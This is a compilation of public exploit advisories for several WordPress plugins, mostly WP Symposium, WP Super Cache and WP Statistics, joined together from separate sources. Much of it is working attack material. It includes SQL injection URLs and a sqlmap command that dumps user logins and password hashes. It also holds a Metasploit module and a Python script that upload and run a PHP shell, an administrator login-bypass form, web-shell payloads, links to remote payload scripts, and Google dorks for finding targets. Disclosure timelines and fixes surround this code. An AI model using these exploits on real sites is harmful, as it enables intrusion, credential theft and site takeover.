Upgrade to version 15.8 or later
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published
Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.
# Exploit Title: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability
# Date: 2015-07-30
# Exploit Author: PizzaHatHacker
# Vendor Homepage: http://www.wpsymposium.com/
# Version: ? <= version <= 15.5.1
# Contact: PizzaHatHacker[a]gmail[.]com
# Tested on: Apache / WordPress 4.2.3 / wp-symposium 15.5.1
# CVE:
# Category: remote
1. Product Description
Extract from the plugin page :
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress plugin that provides a forum, activity (similar to Facebook wall), member directory, private mail, notification panel, chat windows, profile page, social widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook Connect and Mobile support! You simply choose which you want to activate! Certain features are optional to members to protect their privacy."
2. Vulnerability Description & Technical Details
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php parameter 'size'.
The issue is exploitable even if the plugin is deactivated.
3. Impact Analysis :
The SQL injection allows (very easily) to retrieve all the database content, which includes users details and password hashes. An attacker may be able to crack users' password hashes and log in as them. If an administrator user password is obtained, then the attacker could take complete control of the Wordpress installation. Collected information may also allow further attacks.
4. Common Vulnerability Scoring System
* Exploitability Metrics
- Access Vector (AV) : Network (AV:N)
- Access Complexity (AC) : Low (AC:L)
- Authentication (Au) : None (Au:N)
* Impact Metrics
- Confidentiality Impact (C) : Partial (C:P)
- Integrity Impact (I) : Partial (I:P)
- Availability Impact (A) : Partial (A:P)
* CVSS v2 Vector (AV:N/AC:M/Au:N/C:P/I:P/A:P)
- CVSS Base Score : 7.5
- Impact Subscore 6.4
- Exploitability Subscore 10
5. Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt
In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1
6. Vulnerability Timeline
2015-05 : Vulnerability identified
2015-07-30 : Vendor informed about this issue
2015-07-30 : Vendor confirms the issue
2015-08-04 : Ask for a delay to deploy the fix
2015-08-04 : Response : 1-2 days (needs testing)
2015-08-07 : Update to version 15.8 is available
2015-08-10 : Disclosure of this document (a diff on the patch will trivially reveal the issue)
7. Solution
Update Wordpress plugin wp-symposium to the latest version, which is 15.8 at the date I am writing this.
8. Personal Notes
I am not a security professional, just a fan of computer security.
If you have any questions/remarks, feel free to contact me.
I'm interesting in any discussion/advice/question/criticism about security/exploits/programming :-)
=======================================================================
title: SQL Injection
product: WordPress WP Symposium Plugin
vulnerable version: 15.1 (and probably below)
fixed version: 15.4
CVE number: CVE-2015-3325
impact: CVSS Base Score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
homepage: https://wordpress.org/plugins/wp-symposium/
found: 2015-02-07
by: Hannes Trunde
mail: hannes.trunde@gmail.com
twitter: @hannestrunde
=======================================================================
Plugin description:
-------------------
"WP Symposium turns a WordPress website into a Social Network! It is a WordPress
plugin that provides a forum, activity (similar to Facebook wall), member
directory, private mail, notification panel, chat windows, profile page, social
widgets, activity alerts, RSS activity feeds, Groups, Events, Gallery, Facebook
Connect and Mobile support! You simply choose which you want to activate!
Certain features are optional to members to protect their privacy."
Source: https://wordpress.org/plugins/wp-symposium/
Recommendation:
---------------
The author has provided a fixed plugin version which should be installed
immediately.
Vulnerability overview/description:
-----------------------------------
Because of insufficient input validation, a blind sql injection attack can be
performed within the forum feature to obtain sensitive information from the
database. The vulnerable code sections are described below.
forum.php lines 59-62:
===============================================================================
if ( ( $topic_id == '' && $cat_id == '') || ( !$cat_id != '' && get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') && !get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') ) ) {
$cat_id = isset($_GET['cid']) ? $_GET['cid'] : 0;
$topic_id = isset($_GET['show']) ? $_GET['show'] : 0; // GET PARAMETER IS ASSIGNED TO $topic_id VARIABLE
}
===============================================================================
forum.php lines 95-103:
===============================================================================
if ( get_option(WPS_OPTIONS_PREFIX.'_permalink_structure') || !get_option(WPS_OPTIONS_PREFIX.'_forum_ajax') ) {
if ($topic_id == 0) {
$forum = __wps__getForum($cat_id);
if (($x = strpos($forum, '[|]')) !== FALSE) $forum = substr($forum, $x+3);
$html .= $forum;
} else {
$html .= __wps__getTopic($topic_id); // __wps__getTopic IS CALLED WITH $topic_id AS PARAMETER
}
}
===============================================================================
functions.php lines 152-155:
===============================================================================
$post = $wpdb->get_row("
SELECT tid, topic_subject, topic_approved, topic_category, topic_post, topic_started, display_name, topic_sticky, topic_owner, for_info
FROM ".$wpdb->prefix."symposium_topics t INNER JOIN ".$wpdb->base_prefix."users u ON t.topic_owner = u.ID
WHERE (t.topic_approved = 'on' OR t.topic_owner = ".$current_user->ID.") AND tid = ".$topic_id); //UNVALIDATED $topic_id IS USED IN SQL QUERY
===============================================================================
Proof of concept:
-----------------
The following HTTP request to the forum page returns the topic with id 1:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=1
===============================================================================
The following HTTP request to the forum page returns a blank page, thus
confirming the blind SQL injection vulnerability:
===============================================================================
http://www.site.com/?page_id=4&cid=1&show=1 AND 1=0
===============================================================================
Obtaining users and password hashes with sqlmap may look as follows:
================================================================================
sqlmap -u "http://www.site.com/?page_id=4&cid=1&show=1" -p "show" --technique=B --dbms=mysql --sql-query="select user_login,user_pass from wp_users"
================================================================================
Contact timeline:
------------------------
2015-04-08: Contacting author via mail.
2015-04-13: Mail from author, confirming the vulnerability.
2015-04-14: Requesting CVE via post to the open source software security mailing
list: http://openwall.com/lists/oss-security/2015/04/14/5
2015-04-15: Mail from author, stating that updated plugin version will be
available in the next few days.
2015-05-05: Mail from author, stating that fixed version has been uploaded and
should be available soon.
2015-05-07: Confirming that update is available, releasing security advisory
Solution:
---------
Update to the most recent plugin version.
Workaround:
-----------
See solution.
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress WP Symposium 14.11 Shell Upload',
'Description' => %q{WP Symposium Plugin for WordPress contains a
flaw that allows a remote attacker to execute
arbitrary PHP code. This flaw exists because the
/wp-symposium/server/file_upload_form.php script
does not properly verify or sanitize
user-uploaded files. By uploading a .php file,
the remote system will place the file in a
user-accessible path. Making a direct request to
the uploaded file will allow the attacker to
execute the script with the privileges of the
web server.},
'License' => MSF_LICENSE,
'Author' =>
[
'Claudio Viviani', # Vulnerability disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['OSVDB', '116046'],
['WPVDB', '7716']
],
'DisclosureDate' => 'Dec 11 2014',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['wp-symposium < 14.12', {}]],
'DefaultTarget' => 0
))
end
def check
check_plugin_version_from_readme('wp-symposium', '14.12')
end
def generate_mime_message(payload, payload_name, directory_name, symposium_url)
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="uploader_uid"')
data.add_part("./#{directory_name}/", nil, nil, 'form-data; name="uploader_dir"')
data.add_part(symposium_url, nil, nil, 'form-data; name="uploader_url"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"files[]\"; filename=\"#{payload_name}\"")
data
end
def exploit
print_status("#{peer} - Preparing payload")
unique_name = Rex::Text.rand_text_alpha(10)
payload_name = "#{unique_name}.php"
symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php')
payload_url = normalize_uri(symposium_url, unique_name, payload_name)
data = generate_mime_message(payload, payload_name, unique_name, symposium_url)
symposium_url = normalize_uri(symposium_url, 'index.php')
print_status("#{peer} - Uploading payload to #{payload_url}")
res = send_request_cgi(
'method' => 'POST',
'uri' => symposium_url,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0'
print_good("#{peer} - Uploaded the payload")
register_files_for_cleanup(payload_name)
print_status("#{peer} - Executing the payload...")
send_request_cgi(
{
'uri' => payload_url,
'method' => 'GET'
}, 5)
print_good("#{peer} - Executed payload")
else
if res.nil?
fail_with(Failure::Unreachable, "No response from the target")
else
vprint_error("#{peer} - HTTP Status: #{res.code}")
vprint_error("#{peer} - Server returned: #{res.body}")
fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
end
end
end
end
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27: Discovered vulnerability
# 2014-12-01: Vendor Notification (Twitter)
# 2014-12-02: Vendor Notification (Web Site)
# 2014-12-04: Vendor Notification (E-mail)
# 2014-12-11: No Response/Feedback
# 2014-12-11: Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
# if ($_FILES["file"]["error"] > 0) {
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
# } else {
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
# //echo "Extension: " . $ext . "<br />";
# if (strpos($allowedExts, $ext)) {
# $extAllowed = true;
# } else {
# $extAllowed = false;
# }
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
# if (!$extAllowed) {
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
# } else {
# // Copy file to tmp location
# ...
# ...
# ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
getfields = dict()
getfields['uploader_uid'] = '1'
getfields['uploader_dir'] = './'+randDirName
getfields['uploader_url'] = url_symposium_upload
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ _______ _______ __
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|: |: | |: 1 |_____| |__|
|::.|:. |::.| |::.. . |
`--- ---`---' `-------'
Wp-Symposium
Sh311 Upl04d Vuln3r4b1l1ty
v14.11
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
randDirName = id_generator()
randShellName = id_generator()
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0" or read == "":
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 – WordPress Plugin – Sql Injection
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 7.1.3
# Tested on: Ubuntu 14.04
1 - Description:
Type user access: any user. $_POST[‘cat_id’] is not escaped. Is accessible for any user.
http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
2 - Proof of Concept:
<form action="http://target/wp-admin/admin-ajax.php" method="post">
<input type="text" name="action" value="wpsp_getCatName">
<input type="text" name="cat_id" value="0 UNION SELECT 1,CONCAT(name,CHAR(58),slug),3 FROM wp_terms WHERE term_id=1">
<input type="submit" name="">
</form>
3 - Timeline:
- 12/12/2016 – Discovered
- 13/12/2016 – Vendor notifed
- 16/12/2016 – Resolve issue version 7.1.5
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
# Software Link: https://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: web
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
2. Proof of Concept
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then you can go to admin panel.
# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
# Author: h4shur
# date: 2021-05-06
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/wp-super-edit/
# Version : 2.5.4 and earlier
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork :
# inurl:"wp-content/plugins/wp-super-edit/superedit/"
# inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/"
### Note:
# 1. Technical Description:
This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
# 2. Technical Description:
WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
### POC:
* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html
* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html
* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html
* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/
### -- [ Info: ]
[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.
[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.
[i] Another possible attack vector: from XSS to RCE.
### -- [ Impact: ]
[~] Full compromise of the vulnerable web application and also web server.
### -- [ Payloads: ]
[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'
[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!--
[$] ';`$_GET[13]`;#
### -- [ PoC #1 | Authenticated RCE | Cache Location: ]
[!] POST /wp-admin/options-general.php?page=wpsupercache&tab=settings
HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 501
Cookie: [cookies]
_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings
### -- [ PoC #2 | From XSS to RCE | Cache Location: ]
[!] https://m0ze.ru/payload/wp-super-cache-rce.js
[!] https://m0ze.ru/payload/wp-super-cache-rce-j.js
source: https://www.securityfocus.com/bid/59470/info
The WP Super Cache plugin for WordPress is prone to a remote PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
WP Super Cache 1.2 is vulnerable; other versions may also be affected.
<!?mfunc echo PHP_VERSION; ?><!?/mfunc?>
# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
# Date: 20/05/2021
# Exploit Author: Mansoor R (@time4ster)
# CVSS Score: 7.5 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
# Version Affected: 13.0 to 13.0.7
# Vendor URL: https://wordpress.org/plugins/wp-statistics/
# Patch: Upgrade to wp-statistics 13.0.8 (or above)
# Tested On: wp-statistics 13.0.6,13.0.7
#!/bin/bash
# Credits:
# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
# SQLmap Exploit for grepping database banner (automated):
# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
# WARNINGS:
# Only test the exploit on websites you are authorized to.
# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
# Exploit
# ==============
echo
echo "============================================================================================"
echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp-url <string> Wordpress target url
-k|--check Only checks whether vulnerable version of plugin is running or not.
-h|--help Print Help menu
Example:
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress
./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
"
}
#Processing arguments
check="false"
exploit="true"
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp-url)
wp_url="$2"
shift
shift # past argument
;;
-k|--check)
check="true"
exploit="false"
shift
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
function checkVersion()
{
url="$1"
[[ -z "$url" ]] && return
target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version"
[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
is_vulnerable="false"
for v in "${vuln_version[@]}";do
[[ "$version" == "$v" ]] && is_vulnerable="true" && break
done
[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is Not Vulnerable"
}
function exploitPlugin()
{
url="$1"
target_endpoint="$url/wp-admin/admin.php"
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
sleep=3
payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
read choice
[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
echo
echo "[+] Trying Payload:"
set -x
curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
--data-urlencode "page=wps_pages_page" \
--data-urlencode "type=1" \
--data-urlencode "$payload"
}
[[ "$check" == "true" ]] && checkVersion "$wp_url"
[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"